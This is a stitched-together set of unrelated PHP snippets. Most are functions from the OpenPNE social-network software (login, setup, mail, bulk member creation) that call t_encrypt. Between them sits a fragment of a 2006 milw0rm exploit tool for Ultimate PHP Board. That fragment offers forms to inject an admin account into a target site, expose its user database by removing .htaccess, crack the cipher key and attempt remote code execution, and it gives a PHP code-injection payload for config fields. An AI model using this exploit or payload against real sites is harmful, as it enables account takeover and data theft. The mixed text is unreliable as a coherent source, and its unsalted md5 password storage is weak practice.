function execute($requests) { $errors = array(); if (!db_common_is_mailaddress($requests['pc_address']) || is_ktai_mail_address($requests['pc_address'])) { $errors[] = 'PCメールアドレスを正しく入力してください'; } if (OPENPNE_AUTH_MODE == 'email') { if ($requests['password'] !== $requests['password2']) { $errors[] = 'パスワードが一致していません'; } } if ($requests['admin_password'] !== $requests['admin_password2']) { $errors[] = '管理用パスワードが一致していません'; } if (OPENPNE_AUTH_MODE == 'slavepne') { $auth_config = get_auth_config(false); $storage = Auth::_factory($auth_config['storage'], $auth_config['options']); $result = $storage->fetchData($requests['username'], $requests['password'], false); if ($result !== true) { $errors[] = 'ログインIDまたはパスワードが一致しません'; } } if (OPENPNE_AUTH_MODE == 'pneid') { if (is_null($requests['username']) || $requests['username'] === '') { $errors[] = 'ログインIDを入力してください'; } elseif (!preg_match('/^[a-zA-Z0-9][a-zA-Z0-9\\-_]+[a-zA-Z0-9]$/i', $requests['username'])) { $errors[] = 'ログインIDは4~30文字の半角英数字、記号(アンダーバー「_」、ハイフン「-」)で入力してください'; } elseif (mb_strwidth($requests['username'], 'UTF-8') < 4) { $errors[] = "ログインIDは半角4文字以上で入力してください"; } elseif (mb_strwidth($requests['username'], 'UTF-8') > 30) { $errors[] = "ログインIDは半角30文字以内で入力してください"; } } if ($errors) { $this->handleError($errors); } // c_admin_config: SNS_NAME $data = array('name' => 'SNS_NAME', 'value' => $requests['SNS_NAME']); db_insert('c_admin_config', $data); // c_member_secure $data = array('c_member_id' => 1, 'hashed_password' => md5($requests['password']), 'hashed_password_query_answer' => '', 'pc_address' => t_encrypt($requests['pc_address']), 'ktai_address' => '', 'regist_address' => t_encrypt($requests['pc_address']), 'easy_access_id' => ''); if (OPENPNE_AUTH_MODE == 'slavepne' && !IS_SLAVEPNE_EMAIL_REGIST) { $data['ktai_address'] = t_encrypt('*****@*****.**'); } db_insert('c_member_secure', $data); // c_admin_user $data = array('username' => $requests['admin_username'], 'password' => md5($requests['admin_password']), 'auth_type' => 'all'); db_insert('c_admin_user', $data); if (OPENPNE_AUTH_MODE != 'email') { db_member_insert_username(1, $requests['username']); } openpne_redirect('setup', 'page_setup_done'); }
/** * Shibboleth login using setAuth * * @access public * @return true/false */ public function login($is_save_cookie = false, $is_encrypt_username = false) { $this->auth =& $this->factory(true); $address = $this->get_attribute(); // Login fail if essential attribute is empty. if (!$address) { return false; } if (!IS_SLAVEPNE) { // IS_SLAVEPNE is false on Shibboleth if ($is_encrypt_username) { $this->auth->post[$this->auth->_postUsername] = t_encrypt($address); } } // Is $address existing? if (db_member_c_member_id4pc_address($address)) { $this->auth->setAuth($this->auth->post[$this->auth->_postUsername]); if (OPENPNE_SESSION_CHECK_URL) { $this->auth->setAuthData('OPENPNE_URL', OPENPNE_URL); } $this->sess_id = session_id(); if ($is_save_cookie) { $expire = time() + 2592000; } else { $expire = 0; } // Shibboleth don't consider the ktai, because $this->ktai is false. setcookie(session_name(), session_id(), $expire, $this->cookie_path); $this->adjust_cookie(); return true; } else { if (OPENPNE_SHIB_AUTO_REGIST) { $this->register_user($address); } return false; } }
function do_common_send_mail_c_commu_admin_change($c_member_id_to, $c_commu_id) { $c_member_to = $c_member = db_member_c_member4c_member_id($c_member_id_to, true); $c_commu = db_commu_c_commu4c_commu_id($c_commu_id); $to_address = ''; $params = array('c_member_to' => $c_member_to, 'c_commu' => $c_commu); if (!empty($c_member_to['secure']['pc_address'])) { $to_address = $c_member_to['secure']['pc_address']; return fetch_send_mail($to_address, 'm_pc_c_commu_admin_change', $params); } else { $p = array('kad' => t_encrypt(db_member_username4c_member_id($c_member['c_member_id'], true))); $params['login_url'] = openpne_gen_url('ktai', 'page_o_login', $p); $to_address = $c_member_to['secure']['ktai_address']; return fetch_send_mail($to_address, 'm_ktai_c_commu_admin_change', $params); } }
function execute($requests) { if (!($c_member_id = db_member_c_member_id4easy_access_id(OpenPNE_KtaiID::getID()))) { // 認証エラー $p = array('msg' => 14, 'kad' => t_encrypt($requests['ktai_address']), 'login_params' => $requests['login_params']); openpne_redirect('ktai', 'page_o_login', $p); } $c_member = db_member_c_member4c_member_id($c_member_id, true); @session_name('OpenPNEktai'); $config = get_auth_config(true); $auth = new OpenPNE_Auth($config); $auth->setExpire($GLOBALS['OpenPNE']['ktai']['session_lifetime']); $auth->setIdle($GLOBALS['OpenPNE']['ktai']['session_idletime']); $this->_auth =& $auth; if (LOGIN_CHECK_ENABLE) { // 不正ログインチェック include_once 'OpenPNE/LoginChecker.php'; $options = array('check_num' => LOGIN_CHECK_NUM, 'check_time' => LOGIN_CHECK_TIME, 'reject_time' => LOGIN_REJECT_TIME); $lc = new OpenPNE_LoginChecker($options); if ($lc->is_rejected()) { // 認証エラー $lc->fail_login(); $p = array('msg' => '0', 'login_params' => $requests['login_params']); openpne_redirect('ktai', 'page_o_login', $p); } } $auth->auth =& $auth->factory(true); $username = db_member_username4c_member_id($c_member_id, true); if (OPENPNE_AUTH_MODE == 'email') { $username = t_encrypt($username); } $auth->auth->setAuth($username); $auth->auth->setAuthData('OPENPNE_URL', OPENPNE_URL); $auth->auth->setAuthData('USER_AGENT', $_SERVER['HTTP_USER_AGENT']); if (OPENPNE_ONE_SESSION_PER_USER) { db_member_update_c_member_secure_insert_sess_id($c_member_id, session_id()); } if (db_member_is_login_rejected($c_member_id)) { ktai_display_error('ログインできませんでした。'); } if (db_member_is_blacklist($c_member_id)) { ktai_display_error('ログインできませんでした。'); } db_member_do_access($c_member_id); // ログイン後のリダイレクト先を決定する $a = ''; $m = 'ktai'; $p = array(); if ($requests['login_params']) { parse_str($requests['login_params'], $p); } if (!empty($p['a'])) { $a = $p['a']; } if (!empty($p['m'])) { $m = $p['m']; } if ($m == 'ktai' && $a == 'page_o_login') { $a = ''; } $_SESSION['c_member_id'] = $c_member_id; $p['ksid'] = session_id(); openpne_redirect($m, $a, $p); }
# OPENPNE_DIR/bin/tool_create_member.php # cd OPENPNE_DIR/bin/ # php tool_create_member.php require_once './config.inc.php'; require_once OPENPNE_WEBAPP_DIR . '/init.inc'; print "start\n"; $want_member_num = 380000; $db =& db_get_instance(); $matome_num = 1000; for ($i = 0; $i < $want_member_num; $i += $matome_num) { $sql = "INSERT INTO `c_member` (c_member_id, nickname, birth_year, birth_day, c_password_query_id, c_member_id_invite, is_receive_mail, is_receive_ktai_mail, is_receive_daily_news, public_flag_birth_year, public_flag_birth_month_day) VALUES "; $sql2 = "INSERT INTO `c_member_secure` (c_member_id, hashed_password, pc_address, regist_address) VALUES "; $is_first = true; for ($j = 0; $j < $matome_num; $j++) { if ($is_first == true) { $is_first = false; } else { $sql .= ","; $sql2 .= ","; } $member_id = 1 + ($i + $j); $sql .= '(' . $member_id . ',"hoge",2001,10,10,0,1,1,1,"public","public")'; $pc_address = t_encrypt("sns" . $member_id . "@example.com"); $regist_address = t_encrypt("sns" . $member_id . "@example.com"); $sql2 .= '(' . $member_id . ',md5("pohigepoihge"),"' . $pc_address . '","' . $regist_address . '")'; } $result = $db->query($sql); $result = $db->query($sql2); print $i . ","; } print "end\n";
/** * スケジュール通知メールを送信する */ function biz_do_common_send_schedule_mail() { $y = date("Y"); $m = date("m"); $d = date("d"); $c_schedule_list = biz_getDateSchedule($y, $m, $d); $send_list = array(); foreach ($c_schedule_list as $schedule_id) { $value = biz_getScheduleInfo($schedule_id); $biz_schedule_member = biz_getJoinIdSchedule($value['biz_schedule_id']); foreach ($biz_schedule_member as $c_member_id) { $send_list[$c_member_id][] = $value; } } foreach ($send_list as $c_member_id => $c_schedule_list) { $c_member_secure = db_member_c_member_secure4c_member_id($c_member_id); if (!empty($c_member_secure['pc_address'])) { // PCメールアドレスがある場合は、PCのみ送信 $pc_address = $c_member_secure['pc_address']; $params = array('c_member' => db_member_c_member4c_member_id_LIGHT($c_member_id), 'c_schedule_list' => $c_schedule_list); fetch_send_mail($pc_address, 'm_pc_schedule_mail', $params); } else { // PCメールアドレスがない場合は、携帯のみ送信 $ktai_address = $c_member_secure['ktai_address']; $p = array('kad' => t_encrypt(db_member_username4c_member_id($c_member_id, true))); $login_url = openpne_gen_url('ktai', 'page_o_login', $p); $params = array('c_member' => db_member_c_member4c_member_id_LIGHT($c_member_id), 'login_url' => $login_url, 'c_schedule_list' => $c_schedule_list); fetch_send_mail($ktai_address, 'm_ktai_schedule_mail', $params); } } }
if (isset($_REQUEST['cypher']) && isset($_REQUEST['plain'])) { $cypher_len = strlen($_REQUEST['cypher']); $offset = gen_offset($_REQUEST['cypher'], $_REQUEST['plain']); print "Offset:"; for ($x = 0; $x < $cypher_len; $x++) { print $offset[$x] . ':'; } print '<br>'; $validKeys = 0; $y = 0; for ($y = 255; $y >= 0; $y--) { $newKey[$y] = gen_collision($offset, $y); $key_len = strlen($newKey[$y]); print "<br>Key:{$y} = "; for ($x = 0; $x <= $key_len; $x++) { print $newKey[$y][$x]; } print "<br>Cypher:" . t_encrypt($_REQUEST['plain'], $newKey[$y]); print "<br>Plain :" . t_decrypt($_REQUEST['cypher'], $newKey[$y]) . "<br><br>"; } exit; } } } } } print "<title> Ultimate PHP Board Remote Code EXEC 0-Day </title>\n \n <CENTER><B><I>0-day</I></B></CENTER>\n ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>\n <B><I>Get Admin</I></B><br>\n <B>Inject an administrative account into UPB:</B>\n <p>\n <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n <p>\n Path to attack:<i>(example: http://www.domain.ext/PathToUPB)</i><br>\n <input name=\"addVict\" type=\"text\" size=60> <br>\n Inject Name:<br>\n <input name=\"addName\" type=\"text\" size=60> <br>\n Inject Password:<br>\n <input name=\"addPass\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"Inject Admin\"> \n </form>\n \n <p>\n <B>PHP code injection is possilbe in the admin panel without an exploit. Both admin_config.php and admin_config2.php can be used to execute PHP by tagging on: ' \";phpinfo(); \$crap=\"1 ' to any of the config values </B>( double quotes \" are only used in exploit)</B>\n <p> \n ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>\n <B><I>Gain Read Access To The Database</I></B>\n\n <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n <p>\n Removes /db/.htaccess to allow access to the remote target's flat file database:<i>(example: http://www.domain.ext/PathToUPB [no trailing slash]) (user database in /db/users.dat) </i><br><br>\n <input name=\"victHTA\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"Attack\">\n </form> \n ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>\n <B><I>Crypto</I></B> \n\t\n <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n <p>\n Plain Text Password:<br>\n <input name=\"encrypt\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"Encrypt\"> \n </form>\n <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n Encrypted Password:<br>\n <input name=\"decrypt\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"Decrypt\"> \n </form>\n ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br> \n <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n <p>\n Plain Text:<br>\n <input name=\"plain\" type=\"text\" size=60> <br>\n <p> \n corosponding cypher text:<br>\n <input name=\"cypher\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"crack key\"> \n </form>\n ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>\n <B><I>Proof of Concept Only, Unstable Remote Code Execution Using NON-SQL Database Injection</I></B>\n <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n <p>\n perl CGI Code Injection Attack Remote Target:<br>\n <input name=\"vict\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"Attack\">\n </form>\n \n <B>http://www.domain.ext/PathToUPB (no trailing slash)</B>\n </body>"; ?> # milw0rm.com [2006-06-20]
/** * リクエストからログイン処理をおこなう * * @param bool $is_save_cookie クッキーの保存期限を設定するかどうか * @return bool */ function login($is_save_cookie = false) { $this->auth =& $this->factory(true); if ($this->is_lowercase_username) { $this->auth->post[$this->auth->_postUsername] = strtolower($this->auth->post[$this->auth->_postUsername]); } if ($this->is_encrypt_username) { $this->auth->post[$this->auth->_postUsername] = t_encrypt($this->auth->post[$this->auth->_postUsername]); } $this->auth->start(); if ($this->auth->getAuth()) { if (OPENPNE_SESSION_CHECK_URL) { $this->auth->setAuthData('OPENPNE_URL', OPENPNE_URL); } if ($this->is_check_user_agent) { $this->auth->setAuthData('USER_AGENT', $_SERVER['HTTP_USER_AGENT']); } $this->sess_id = session_id(); if (!$this->is_ktai) { if ($is_save_cookie) { $expire = time() + 2592000; // 30 days } else { $expire = 0; } setcookie(session_name(), session_id(), $expire, $this->cookie_path); } return true; } else { return false; } }
function execute($requests) { // --- リクエスト変数 $ses = $requests['ses']; $password = $requests['password']; // ---------- // セッションが有効かどうか if (!($pre = db_member_c_ktai_address_pre4session($ses))) { // 無効の場合、login へリダイレクト openpne_redirect('ktai', 'page_o_login'); } // メールアドレスが登録できるかどうか if (!util_is_regist_mail_address($pre['ktai_address'], $pre['c_member_id'])) { openpne_redirect('ktai', 'page_o_login', array('msg' => 42)); } $c_member_id = $pre['c_member_id']; $ktai_address = $pre['ktai_address']; // パスワードチェック if (!db_common_authenticate_password($c_member_id, $password, true)) { $p = array('msg' => 18, 'ses' => $ses); openpne_redirect('ktai', 'page_o_login2', $p); } if (IS_GET_EASY_ACCESS_ID == 2 || IS_GET_EASY_ACCESS_ID == 3) { // 携帯の個体識別番号の取得が必須 if (!($easy_access_id = OpenPNE_KtaiID::getID())) { // 携帯の個体識別番号を取得できませんでした $p = array('msg' => 27, 'ses' => $ses); openpne_redirect('ktai', 'page_o_login2', $p); } else { $id = db_member_c_member_id4easy_access_id($easy_access_id); if ($id && $c_member_id != $id) { $p = array('msg' => 39, 'ses' => $ses); openpne_redirect('ktai', 'page_o_login2', $p); } if (db_member_easy_access_id_is_blacklist(md5($easy_access_id))) { ktai_display_error('携帯メールアドレスを登録できませんでした。'); } // update db_member_update_easy_access_id($c_member_id, $easy_access_id); db_member_update_ktai_address($c_member_id, $ktai_address); db_member_delete_ktai_address_pre($pre['c_ktai_address_pre_id']); openpne_redirect('ktai', 'do_o_easy_login'); } } else { if (IS_GET_EASY_ACCESS_ID == 1) { // 携帯の個体識別番号の取得が任意 if ($easy_access_id = OpenPNE_KtaiID::getID()) { $id = db_member_c_member_id4easy_access_id($easy_access_id); if ($id && $c_member_id != $id) { $p = array('msg' => 39, 'ses' => $ses); openpne_redirect('ktai', 'page_o_login2', $p); } if (db_member_easy_access_id_is_blacklist(md5($easy_access_id))) { ktai_display_error('携帯メールアドレスを登録できませんでした。'); } // update db_member_update_easy_access_id($c_member_id, $easy_access_id); db_member_update_ktai_address($c_member_id, $ktai_address); db_member_delete_ktai_address_pre($pre['c_ktai_address_pre_id']); openpne_redirect('ktai', 'do_o_easy_login'); } } } // 携帯の個体識別番号を取得しない db_member_update_ktai_address($c_member_id, $ktai_address); db_member_delete_ktai_address_pre($pre['c_ktai_address_pre_id']); // login ページへリダイレクト $p = array('msg' => 19, 'kad' => t_encrypt(db_member_username4c_member_id($c_member_id, true))); openpne_redirect('ktai', 'page_o_login', $p); }
function execute($requests) { // --- リクエスト変数 $c_member_id = $requests['c_member_id']; $ktai_address = $requests['ktai_address']; $password = $requests['password']; // ---------- @session_name('OpenPNEktai'); $config = get_auth_config(true); $auth = new OpenPNE_Auth($config); $auth->setExpire($GLOBALS['OpenPNE']['ktai']['session_lifetime']); $auth->setIdle($GLOBALS['OpenPNE']['ktai']['session_idletime']); $this->_auth =& $auth; if (LOGIN_CHECK_ENABLE) { // 不正ログインチェック include_once 'OpenPNE/LoginChecker.php'; $options = array('check_num' => LOGIN_CHECK_NUM, 'check_time' => LOGIN_CHECK_TIME, 'reject_time' => LOGIN_REJECT_TIME); $lc = new OpenPNE_LoginChecker($options); if ($lc->is_rejected() || !$auth->login()) { // 認証エラー $lc->fail_login(); $p = array('msg' => '0', 'kad' => t_encrypt($ktai_address), 'login_params' => $requests['login_params']); openpne_redirect('ktai', 'page_o_login', $p); } } else { if (!$auth->login()) { $p = array('msg' => '0', 'kad' => t_encrypt($ktai_address), 'login_params' => $requests['login_params']); openpne_redirect('ktai', 'page_o_login', $p); } } $c_member_id = db_member_c_member_id4username_encrypted($auth->getUsername(), true); if (OPENPNE_AUTH_MODE == 'slavepne' && !$c_member_id) { $c_member_id = db_member_create_member($_POST['username']); } if (!$c_member_id) { $p = array('msg' => '0', 'kad' => t_encrypt($ktai_address), 'login_params' => $requests['login_params']); openpne_redirect('ktai', 'page_o_login', $p); } if (OPENPNE_ONE_SESSION_PER_USER) { db_member_update_c_member_secure_insert_sess_id($c_member_id, session_id()); } if (db_member_is_login_rejected($c_member_id)) { ktai_display_error('ログインできませんでした。'); } if (db_member_is_blacklist($c_member_id)) { ktai_display_error('ログインできませんでした。'); } db_member_do_access($c_member_id); // ログイン後のリダイレクト先を決定する $a = ''; $m = 'ktai'; $p = array(); if ($requests['login_params']) { parse_str($requests['login_params'], $p); } if (!empty($p['a'])) { $a = $p['a']; } if (!empty($p['m'])) { $m = $p['m']; } if ($m == 'ktai' && $a == 'page_o_login') { $a = ''; } $_SESSION['c_member_id'] = $c_member_id; $p['ksid'] = session_id(); openpne_redirect($m, $a, $p); }
function do_admin_send_message_mail_send_ktai($c_member_id_to, $c_member_id_from, $subject, $body) { $c_member_to = db_member_c_member4c_member_id($c_member_id_to, true); $ktai_address = $c_member_to['secure']['ktai_address']; $is_receive_ktai_mail = $c_member_to['is_receive_ktai_mail']; $p = array('kad' => t_encrypt(db_member_username4c_member_id($c_member_to['c_member_id'], true))); $login_url = openpne_gen_url('ktai', 'page_o_login', $p); $params = array('c_member_to' => db_member_c_member4c_member_id($c_member_id_to), 'c_member_from' => db_member_c_member4c_member_id($c_member_id_from), 'login_url' => $login_url, 'subject' => $subject, 'body' => $body); return admin_fetch_send_mail($ktai_address, 'm_ktai_message_zyushin', $params, $is_receive_ktai_mail); }
/** * ログインしたメンバーの情報が存在しない場合自動で生成 */ function db_member_create_member($username) { $data = array('nickname' => 'NO NAME', 'birth_year' => 0, 'birth_month' => 0, 'birth_day' => 0, 'public_flag_birth_year' => 'public', 'public_flag_birth_month_day' => 'public', 'c_member_id_invite' => 1, 'c_password_query_id' => 0, 'is_receive_mail' => true, 'is_receive_ktai_mail' => true, 'is_receive_daily_news' => true, 'r_date' => db_now(), 'u_datetime' => db_now(), 'image_filename' => '', 'image_filename_1' => '', 'image_filename_2' => '', 'image_filename_3' => '', 'rss' => ''); $c_member_id = db_insert('c_member', $data); if (!$c_member_id) { return false; } $data = array('c_member_id' => intval($c_member_id), 'hashed_password' => "", 'hashed_password_query_answer' => "", 'pc_address' => "", 'ktai_address' => "", 'regist_address' => "", 'easy_access_id' => ''); if (!IS_SLAVEPNE_EMAIL_REGIST) { $data['pc_address'] = t_encrypt($c_member_id . '@pc.example.com'); $data['ktai_address'] = t_encrypt($c_member_id . '@ktai.example.com'); } if (!db_insert('c_member_secure', $data)) { $sql = 'DELETE FROM c_member WHERE c_member_id = ?'; db_query($sql, array($c_member_id)); return false; } $data = array('c_member_id' => intval($c_member_id), 'username' => $username); if (!db_insert('c_username', $data)) { $sql = 'DELETE FROM c_member WHERE c_member_id = ?'; db_query($sql, array($c_member_id)); $sql = 'DELETE FROM c_member_secure WHERE c_member_id = ?'; db_query($sql, array($c_member_id)); return false; } return $c_member_id; }